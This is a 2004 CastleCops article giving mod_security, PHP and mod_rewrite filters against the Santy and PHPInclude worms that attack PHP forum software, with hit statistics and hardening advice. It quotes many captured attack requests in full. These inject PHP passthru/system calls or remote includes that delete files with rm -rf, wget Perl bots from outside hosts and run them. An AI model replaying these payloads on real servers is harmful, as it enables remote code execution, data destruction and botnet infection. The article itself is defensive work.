CastleCops, Internet Crime Fighters
Need help? Click here to register for free! Absolutely zero advertisements on this site!

Donation/Premium
spacer
Donations. Become Premium Today! Premium Icon
block bottom
Security Central
spacer
· Home
· PIRT/Fried Phish
· MIRT
· SIRT
· Deutsch
· Wiki
· Newsletter
· O16/ActiveX
· CLSID List
· Contest2007
· Downloads
· Feedback (send)
· Forums
· HijackThis
· Hijacktrend
· LSPs
· My Downloads
· O18
· O20
· O21
· O22
· O23
· O9
· Premium
· Private Messages
· Proxomitron
· Reviews
· Search
· StartupList
· Stories Archive
· Submit News
· WsIRT
· Your Account
· Acceptable Use Policy
block bottom
spacer spacer
image Filters: Suggested filters against PHP Attacking Worms image
Cyber Security
In our previous story on the Santy worm, I'd left some comments on possible suggestions. To date, I've received replies back stating those suggestions (public and private) have helped tremendously. This article focuses on mod_security's filters, however, alternative filters will also be introduced -- some not tested, so feel free to write back to me here or in email such that they can be improved. What has been tested with success are the mod_security filters, and some mod_rewrite filters. Such are borne due to the life of Santy and Phpinclude worms.

The following code is implemented today in mod_security against the worms that attack PHP scripts: 
    SecFilterSelective ARG_highlight %27
    SecFilterSelective ARG_highlight %2527
    SecFilter "visualcoders\.net/spy\.gif\?\&cmd"
    SecFilter ":/"
    SecFilter "'"
Not all of these were in practice as the worms went live, but over the past couple days it has evolved to what is posted above. Here are some statistics from 25 Dec, 2004 at 15:11 GMT -5 to the writing of this article.

There have been a total of 296,293 attacks received by our servers in a 55 hour period. This is a breakdown (numbers won't add up 100% as additional filters were added to catch all).

SecFilterSelective ARG_highlight %27
Matched 507 of times. HTTP GET examples:
GET /modules.php?name=Forums&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B% 20cd%20/tmp;rm%20-rf%20*;wget% 20http://fff.gratishost.com/sess_0bc3910d07edb36750a9babbd179edb3;perl% 20sess_0bc3910d07edb36750a9babbd179edb3;wget% 20http://fff.gratishost.com/wow.b;perl%20wow.b%3B%20%65%63%68%6F%20%5F%45%4E% 44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54% 5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527

GET /modules.php?name=Forums&highlight=%2527%252esystem(chr(99)%252echr(100)% 252echr(32)%252echr(47) %252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr (103)%252echr(101) %252echr(116)%252echr(32)%252echr(109)%252echr(101)%252echr(109)%252echr(98)% 252echr(101) %252echr(114)%252echr(115)%252echr(46)%252echr(97)%252echr(111)%252echr(108)% 252echr(46) %252echr(99)%252echr(111)%252echr(109)%252echr(47)%252echr(110)%252echr(101)% 252echr(119) %252echr(111)%252echr(107)%252echr(56)%252echr(52)%252echr(48)%252echr(56)% 252echr(47) %252echr(121)%252echr(97)%252echr(121)%252echr(59)%252echr(46)%252echr(47)% 252echr(121) %252echr(97)%252echr(121)%252echr(59)%252echr(119)%252echr(103)%252echr(101)% 252echr(116) %252echr(32)%252echr(109)%252echr(101)%252echr(109)%252echr(98)%252echr(101)% 252echr(114) %252echr(115)%252echr(46)%252echr(97)%252echr(111)%252echr(108)%252echr(46)% 252echr(99) %252echr(111)%252echr(109)%252echr(47)%252echr(104)%252echr(121)%252echr (100)%252echr(114) %252echr(111)%252echr(48)%252echr(48)%252echr(48)%252echr(47)%252echr(119)% 252echr(111) %252echr(114)%252echr(109)%252echr(46)%252echr(116)%252echr(120)%252echr (116)%252echr(59) %252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr (119)%252echr(111) %252echr(114)%252echr(109)%252echr(46)%252echr(116)%252echr(120)%252echr (116))%252e%2527
SecFilterSelective ARG_highlight %2527
Matched 2,607 of times. HTTP GET examples:
GET /modules.php?name=Forums&rush=echo%2520_START_%253B%2520cd%2520/tmp%3Bwget %2520midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111% 3Bperl %2520sess_189f0f0889555397a4de5485dd611111%3Bwget %2520midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113% 3Bperl %2520sess_189f0f0889555397a4de5485dd611113%3Bwget %2520midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112% 3Bperl %2520sess_189f0f0889555397a4de5485dd611112%3Bwget %2520midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114% 3Bperl %2520sess_189f0f0889555397a4de5485dd611114%3Brm%2520-rf %2520sess_189f0f0889555397a4de5485dd611113.*% 2520sess_189f0f0889555397a4de5485dd611114.* %2520sess_189f0f0889555397a4de5485dd611112.*%3Bcp% 2520sess_189f0f0889555397a4de5485dd611111 %2520sess_189f0f0889555397a4de5485dd611113% 2520sess_189f0f0889555397a4de5485dd611114 %2520sess_189f0f0889555397a4de5485dd611112%2520/var/tmp/%3Bcp %2520sess_189f0f0889555397a4de5485dd611111% 2520sess_189f0f0889555397a4de5485dd611113 %2520sess_189f0f0889555397a4de5485dd611114% 2520sess_189f0f0889555397a4de5485dd611112 %2520/var/spool/mail/%3Bcp%2520sess_189f0f0889555397a4de5485dd611111 %2520sess_189f0f0889555397a4de5485dd611113% 2520sess_189f0f0889555397a4de5485dd611114 %2520sess_189f0f0889555397a4de5485dd611112%2520/var/mail/%3Bcp %2520sess_189f0f0889555397a4de5485dd611111% 2520sess_189f0f0889555397a4de5485dd611113 %2520sess_189f0f0889555397a4de5485dd611114% 2520sess_189f0f0889555397a4de5485dd611112 %2520/usr/local/apache/proxy/%3Bcd%2520/var/tmp/%3Bperl% 2520sess_189f0f0889555397a4de5485dd611111 %3Bperl%2520sess_189f0f0889555397a4de5485dd611113%3Bperl %2520sess_189f0f0889555397a4de5485dd611114%3Bperl% 2520sess_189f0f0889555397a4de5485dd611112%3Bcd %2520/var/spool/mail/%3Bperl%2520sess_189f0f0889555397a4de5485dd611111%3Bperl %2520sess_189f0f0889555397a4de5485dd611113%3Bperl% 2520sess_189f0f0889555397a4de5485dd611114 %3Bperl%2520sess_189f0f0889555397a4de5485dd611112%3Bcd%2520/var/mail/%3Bperl %2520sess_189f0f0889555397a4de5485dd611111%3Bperl% 2520sess_189f0f0889555397a4de5485dd611113 %3Bperl%2520sess_189f0f0889555397a4de5485dd611114%3Bperl %2520sess_189f0f0889555397a4de5485dd611112%3Bcd%2520/usr/local/apache/proxy/% 3Bperl %2520sess_189f0f0889555397a4de5485dd611111%3Bperl% 2520sess_189f0f0889555397a4de5485dd611113 %3Bperl%2520sess_189f0f0889555397a4de5485dd611114%3Bperl %2520sess_189f0f0889555397a4de5485dd611112%3Brm%2520-rf %2520/tmp/sess_189f0f0889555397a4de5485dd611111* %2520/var/tmp/sess_189f0f0889555397a4de5485dd611111* %2520/var/spool/mail/sess_189f0f0889555397a4de5485dd611111* %2520/var/mail/sess_189f0f0889555397a4de5485dd611111* %2520/usr/local/apache/proxy/sess_189f0f0889555397a4de5485dd611111*%253B% 2520echo %2520_END_&highlight=%252527.passthru(%2524HTTP_GET_VARS%255Brush%255D).%252527
SecFilter "visualcoders\.net/spy\.gif\?\&cmd"
Matched 186,829 of times.

SecFilter ":/"
Matched 77,164 of times. HTTP GET examples:
GET /check85161previous.html&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B% 20cd%20/tmp;rm %20-rf%20*;wget% 20http://fff.gratishost.com/sess_0bc3910d07edb36750a9babbd179edb3;perl %20sess_0bc3910d07edb36750a9babbd179edb3;wget% 20http://fff.gratishost.com/wow.b;perl%20wow.b%3B %20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28 %24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527

GET /modules.php?name=Statistics&op=Stats//modules.php? name=http://envidiosos.org/~pillar/.zk/php.gif?&cmd=cd%20/tmp;rm%20-rf%20*;wget% 20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl% 20sess_189f0f0889555397a4de5485dd611111;wget% 20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl% 20sess_189f0f0889555397a4de5485dd611113;wget% 20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl% 20sess_189f0f0889555397a4de5485dd611112;wget% 20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl% 20sess_189f0f0889555397a4de5485dd611114;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf% 20*;wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl% 20sess_189f0f0889555397a4de5485dd611111;wget% 20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl% 20sess_189f0f0889555397a4de5485dd611113;wget% 20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl% 20sess_189f0f0889555397a4de5485dd611112;wget% 20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl% 20sess_189f0f0889555397a4de5485dd611114;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20- rf%20*;wget% 20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl% 20sess_189f0f0889555397a4de5485dd611111;wget% 20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl% 20sess_189f0f0889555397a4de5485dd611113;wget% 20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl% 20sess_189f0f0889555397a4de5485dd611112;wget% 20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl% 20sess_189f0f0889555397a4de5485dd611114;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf% 20*;wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl% 20sess_189f0f0889555397a4de5485dd611111;wget% 20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl% 20sess_189f0f0889555397a4de5485dd611113;wget% 20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl% 20sess_189f0f0889555397a4de5485dd611112;wget% 20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl% 20sess_189f0f0889555397a4de5485dd611114;rm%20-rf%20*;cd%20% 20/usr/local/apache/proxy/;rm%20-rf%20*;wget% 20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl% 20sess_189f0f0889555397a4de5485dd611111;wget% 20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl% 20sess_189f0f0889555397a4de5485dd611113;wget% 20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl% 20sess_189f0f0889555397a4de5485dd611112;wget% 20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl% 20sess_189f0f0889555397a4de5485dd611114;rm%20-rf%20*
SecFilter "'"
Matched 10,553 of times. HTTP GET examples:
GET /p284682-Ten_Green_Bottles.html&rush=echo%20_START_%3b%20killall%20-9%20perl%3bcd%20/tmp% 3bwget%20grancassa.co.uk/images/bot%3bperl%20bot%3bwget% 20grancassa.co.uk/images/ssh.a%3bperl%20ssh.a%3brm%20-rf%20ssh.*%3brm%20-rf%20bot*% 3b%20echo%20_END_&highlight=%2527.passthru($HTTP_GET_VARS%5brush%5d).%2527

GET /t27570-winsock_error.html&rush=echo%20_START_%3b%20killall%20-9%20perl%3bcd%20/tmp% 3bwget%20civa.org/pdf/bot%3bperl%20bot%3bwget%20civa.org/pdf/ssh.a%3bperl%20ssh.a% 3brm%20-rf%20ssh.*%3brm%20-rf%20bot*%3b%20echo%20_END_&highlight=%2527.passthru ($HTTP_GET_VARS%5brush%5d).%2527

GET /p284682-Ten_Green_Bottles.html&rush=echo%20_START_%3b%20cd%20/tmp%3bwget% 20crowklan.mine.nu/~pillar/.zk/coll%3bperl%20coll%3bwget% 20crowklan.mine.nu/~pillar/.zk/aol%3bperl%20aol%3brm%20-rf%20aol.*%3brm%20-rf% 20coll*%3b%20echo%20_END_&highlight=%2527.passthru($HTTP_GET_VARS%5brush%5d).%2527


The number of unique IP addresses that sourced these attacks were: 4,809. This is a minimum figure based on a limited search for 'wget'. It doesn't include those attacks which excluded 'wget' in THE_REQUEST.

False positives were found with the :/ filter. This is due to the uncommon GET inclusion of the domain, ie:

GET /http://castlecops.com/index.php

Instead of the correct:

GET /index.php

The natural response of the webserver in this instance is to throw a page not found error. But in our false positive case, modsecurity displayed a 406.

Out of 77,164 matches only 338 were found to be false positives as just described.

Some alternative filters for those not using mod_security.

PHP:
This one includes a basic set of filters that check for more than just the current worm threat. It addresses other well known and (just to be safe) XSS issues: 
foreach ($HTTP_GET_VARS as $secvalue) {
    if ((eregi("<[^>]*script*\"?[^>]*>", $secvalue)) ||
        (eregi("<[^>]*iframe*\"?[^>]*>", $secvalue)) ||
        (eregi("<[^>]*object*\"?[^>]*>", $secvalue)) ||
        (eregi("<[^>]*applet*\"?[^>]*>", $secvalue)) ||
        (eregi("<[^>]*meta*\"?[^>]*>", $secvalue)) ||
        (eregi("<[^>]*style*\"?[^>]*>", $secvalue)) ||
        (eregi("<[^>]*form*\"?[^>]*>", $secvalue)) ||
        (eregi("<[^>]*img*\"?[^>]*>", $secvalue)) ||
        (eregi("\"", $secvalue)) ||
        (eregi("'", $secvalue)) ||
        (eregi("<[^>]*cookie*\"?[^>]*>", $secvalue))) {
       die ("<a href=\"http://castlecops.com\">CastleCops</a> doesn't like 
you... Play somewhere else!");
    }
}
Parts have been tested, and parts have not been, so as if all the suggestions above, proceed with caution and monitor.

mod_rewrite:
.htaccess or httpd.conf 
#TEMP BANS
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} LWP::Simple [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lwp-trivial [NC,OR]
RewriteCond %{HTTP_USER_AGENT} libwww-perl [NC]
RewriteRule ^.*$ http://127.0.0.1 [R,L]
Even though the above filters on user-agents, those can be changed. The last rewriterule tells the requesting IP address (the attacker) to send the requests to itself. This then helps to reduce the amount of garbage sent on the wire. I personally don't recommend this approach, I believe filters should work off the actual HTTP GET and POST requests instead.

LWP::Simple has been found 276,487 times. With such a high figure, I won't bother checking the other two. So if you want a quick fix, then matching on that does the trick.

On the topic of filtering "echr" or or "esystem" as I've been reading on the net such as:

  • (.*)echr(.*)
  • (.*)esystem(.*)


    • The logic is flawed. Here is the explanation...

    Often times they are preceded by:

    %2525echr(x), where 'x' is any character. This turns into:

    %.chr(x), which is a concatenation in PHP, and the chr is a function call in PHP http://php.net/chr.

    So filtering on 'echr' or 'esystem' is not valid, as 'e' is part of the hexadecimal code, and simply put, it can be replaced with another hex code, then the 'echr' filter would not match.

    Filtering then on 'chr' doesn't work either, because you can have multiple false positive matches:

  • chris
  • christmas
  • christ
  • ...


    • Such could be found in the HTTP request. Therefore my recommendation is to stay away from this kind of filtering, unless you are heavily paranoid and don't mind a potential for lots of false positives.

    Another filter I've seen is on "wget". Using that only against THE_REQUEST can spawn lots of false positives, great if you are really paranoid, otherwise, a nuisance because it'll drop valid requests (potentially). Not to mention, there are many attacks that do not use "wget" at all.

    Some hardening suggestions. You can always mount the following directories with 'noexec' to stop the execution of files in them:

  • /tmp
  • /usr/tmp
  • /var/tmp


    • Another notion is that of restricting access permissions to files such as 'wget'. Basically strip the groups and everyone else access to wget, in other words 'chmod 700 wget' or 'chmod 400 wget' whichever you require. This will give 'root' the right to access it and no one else. Going a step further might be to run the same chmod permission setting on '/usr/bin/*cc*'. This will only allow root to run compile programs like 'gcc'. Such hardending suggestions can help to stave off local and remote attacks, but don't consider them 100% foolproof either. Think of this as just another layer of security.

    More suggestions can be made available, but this I feel is a good starting point. If you run into any problems, feel free to reply back here.

    With the mod_security filters in place, none of the attacks on our server have gone unmatched.
    Posted on Monday, 27 December 2004 @ 23:57:48 UTC by Paul (7575 reads)
    [ Trackback ]    		image

    "Filters: Suggested filters against PHP Attacking Worms" | Login/Create an Account | 1 comment | Search
    Threshold
    The comments are owned by the poster. We aren't responsible for their content.

    No Comments Allowed for Anonymous, please register

    Re: Suggested filters against PHP Attacking Worms (Score: 1)
    by schwing  on Tuesday, 01 March 2005 @ 22:05:18 UTC
    (User Info | Send a Message)
    Some hardening suggestions. You can always mount the following directories with 'noexec' to stop the execution of files in them.

    What is the command to mount a directory noexec? I only thought you could mount partitions noexec. Hopefully I'm wrong because I would love to be able to do this.


    		 
    Login
    spacer
    Nickname

    Password

    Security Code: Type Security Code: Usage signifies AUP acceptance
    · New User? · Click here to create a registered account.
    block bottom
    Related Links
    spacer
    · del.icio.us!
    · digg it!
    · reddit!
    · TrackBack (0)
    · PHP HomePage
    · HotScripts
    · Apple
    · Apache Web Server
    · W3 Consortium
    · America Online
    · More about Cyber Security
    · News by Paul

    Most read story about Cyber Security:
    Booby Trapped software!
    block bottom
    Article Rating
    spacer
    Average Score: 0
    Votes: 0

    Please take a second and vote for this article:

    Bad
    Regular
    Good
    Very Good
    Excellent
    block bottom
    Options
    spacer

    Printer Friendly Page  Printer Friendly Page
    block bottom
    2002-2008 © Computer Cops LLC dba CastleCops®. All rights reserved.
    Acceptable Use Policy. Use signifies your agreement.
    158ppm 0.329s (0.017s)
    Making cybercriminals unhappy since 2002*
    In Memory of Trpm
    spacer spacer